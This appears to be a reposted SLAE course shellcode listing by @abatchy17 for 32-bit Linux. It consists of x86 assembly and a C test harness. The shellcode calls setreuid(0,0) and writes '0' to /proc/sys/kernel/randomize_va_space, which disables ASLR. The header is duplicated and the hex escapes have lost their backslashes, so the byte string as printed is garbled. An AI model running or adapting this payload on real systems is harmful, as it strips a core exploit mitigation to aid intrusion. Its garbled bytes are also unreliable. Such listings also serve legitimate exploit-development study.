/*
Linux/x86
setuid-disable-aslr.c by @abatchy17 - abatchy.com
Shellcode size: 80 bytes
SLAE-885
section .text
global _start
_start: Linux/x86
setuid-disable-aslr.c by @abatchy17 - abatchy.com
Shellcode size: 80 bytes
SLAE-885
section .text
global _start
_start:
;
; setruid(0,0)
;
xor ecx,ecx
mov ebx,ecx
push 0x46
pop eax
int 0x80
;
; open("/proc/sys/kernel/randomize_va_spaceX", O_RDWR)
;
xor eax,eax ; EAX = 0
jmp aslr_file
shellcode:
pop ebx ; EBX now points to '/proc/sys/kernel/randomize_va_space'
mov byte [ebx + 35],al
push byte 5
pop eax
push byte 2
pop ecx
int 80h
;
; write(fd, '0', 1)
;
xchg eax, ebx ; One byte less than mov ebx, eax
push byte 4
pop eax
xchg ecx, edx ; ECX already contains 2
dec edx
push byte 0x30
mov ecx, esp ; ECX now points to "0"
int 80h ; EAX will now contains 1
;
; exit(0)
;
int 80h ; Yep, that's it
aslr_file:
call shellcode ; Skips the filename and avoids using JMP
db '/proc/sys/kernel/randomize_va_space'
*/
#include <stdio.h>
#include <string.h>
unsigned char sc[] = "x31xc9x89xcbx6ax46x58xcdx80x31xc0xebx1bx5bx88x43x23x6ax05x58x6ax02x59xcdx80x93x6ax04x58x87xcax4ax6ax30x89xe1xcdx80xcdx80xe8xe0xffxffxffx2fx70x72x6fx63x2fx73x79x73x2fx6bx65x72x6ex65x6cx2fx72x61x6ex64x6fx6dx69x7ax65x5fx76x61x5fx73x70x61x63x65";
int main()
{
printf("Shellcode size: %d
", strlen(sc));
int (*ret)() = (int(*)())sc;
ret();
}
Linux x86 Disable ASLR Shellcode
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 689